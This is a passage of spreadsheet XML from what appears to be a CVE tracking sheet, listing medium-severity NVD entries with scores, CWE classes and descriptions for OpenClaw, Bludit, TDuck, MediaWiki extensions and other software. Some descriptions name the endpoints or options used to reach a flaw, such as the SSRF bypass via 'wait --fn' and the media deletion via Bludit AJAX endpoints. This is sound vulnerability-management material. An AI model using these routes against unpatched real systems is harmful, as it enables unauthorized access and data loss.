      <c r="D329" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="inlineStr"/>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S329" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 contains an access-control bypass in the Microsoft Teams integration. When groupPolicy is set to allowlist, a missing or unsupported configured access group produces a denied group-resolution result that is not rejected by the final message-admission check, so a Teams member who is not on the allowlist can still trigger the configured agent despite the administrator's group boundary. The impact depends on the conversations, tools, and data available to that agent. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100550</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100562</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="inlineStr"/>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S330" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability in the sessions.create endpoint that allows operator.write callers to modify session configurations reserved for operator.admin scope. Attackers with write-scoped credentials can change existing session model, provider, thinking level, and auth-profile settings to redirect traffic and bypass administrative access controls.</t>
        </is>
      </c>
      <c r="T330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100562</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100563</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.8.1 does not neutralize leading characters that spreadsheet applications interpret as formulas when the Control UI exports session data to CSV. Although session labels were quoted as CSV text, a lower-trust participant who can influence a session label or the first user message can place a formula-like cell in the Usage export; if an operator opens that export in a spreadsheet application with formula evaluation enabled, the cell may be evaluated with the permissions of the spreadsheet user. OpenClaw itself does not evaluate the formula, and practical impact depends on the spreadsheet application's security settings. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100563</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100564</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 fail to neutralize spreadsheet formula characters in participant display names within attendance CSV exports. Attackers can inject formula-like cells that execute with spreadsheet user permissions when the export is opened in formula-enabled applications.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100564</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100576</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a server-side request forgery vulnerability in browser wait predicates that allows attackers to bypass SSRF protections by reaching blocked destinations. Attackers can use the wait --fn function against an existing browser session to request loopback or private destinations without navigation checks applied to other browser actions.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100576</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100593</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 does not enforce the documented owner-only requirement for persistent `/activation` policy changes in group channels. An authorized non-owner channel sender can change whether the agent requires mention-based activation, causing the agent to respond more broadly in the group (exposing its responses to additional group traffic) or suppressing expected activation behavior until an owner restores the intended setting. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100593</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93366</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains an authorization bypass vulnerability that allows authenticated users with the Author role to enumerate and delete media files belonging to pages owned by other users, including administrators, by supplying arbitrary uuid parameters to unprotected AJAX endpoints. Attackers can retrieve page UUIDs for all users via the content-get-list endpoint and then submit crafted POST requests to the list-images and delete-image endpoints in bl-kernel/ajax/ to access and destroy media files outside their own pages, bypassing the IMAGE_RESTRICT isolation control.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93366</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100230</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>Input Leap (aka input-leap) through 3.0.3, when the non-default --enable-drag-drop option is used on Windows or macOS, mishandles the / versus \ distinction and allows directory traversal, with resultant code execution if a file is written to a startup directory. This occurs via a DDRG message.</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100230</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100304</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form 6.0 contains an information disclosure vulnerability in FormAuthUtils.hasPermission that fails open when a form does not exist, allowing authenticated users to access deleted form submissions. Attackers can read orphaned submission data including personal information by providing a known dataId to the GET /user/form/data/details endpoint after the form has been permanently deleted.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100304</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100306</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 fails to validate write passwords on submission endpoints, enforcing the check only on the front end. Remote unauthenticated attackers can submit form entries directly to public submission APIs without providing the password by using the form key from share links.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100306</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100378</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Wikimedia Foundation Mediawiki - Translate Extension allows Accessing Functionality Not Properly Constrained by ACLs.
This issue affects Mediawiki - Translate Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100378</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100379</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Wikipedia Android App allows Accessing/Intercepting/Modifying HTTP Cookies.
This issue affects Wikipedia Android App: main.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100379</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100380</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - Wikibase Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - Wikibase Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100380</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100381</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Mediawiki - UploadWizard Extension allows Cross-Site Scripting (XSS).
This issue affects Mediawiki - UploadWizard Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100381</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100418</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Flame through 2.4.0 contains an information exposure vulnerability in the unauthenticated GET /api/config endpoint that returns the entire configuration object without field redaction. Attackers can retrieve the stored weather API key and internal operational settings by sending a single unauthenticated request to consume provider quota or access sensitive configuration data.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100418</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100526</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Discord integration (npm package @openclaw/discord) before version 2026.9.3 could lose the sender-scoped media policy in the emoji and sticker upload actions before loading a local file. A sender permitted to invoke those actions could cause OpenClaw to read a host path that the same sender's configured media roots would otherwise reject, placing bytes from an out-of-policy local file into an outbound emoji or sticker upload. Exploitation requires access to the guild asset action and knowledge or derivation of a useful local path; the issue does not permit unrestricted filesystem browsing or code execution. The issue is fixed in @openclaw/discord 2026.9.3.</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100526</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
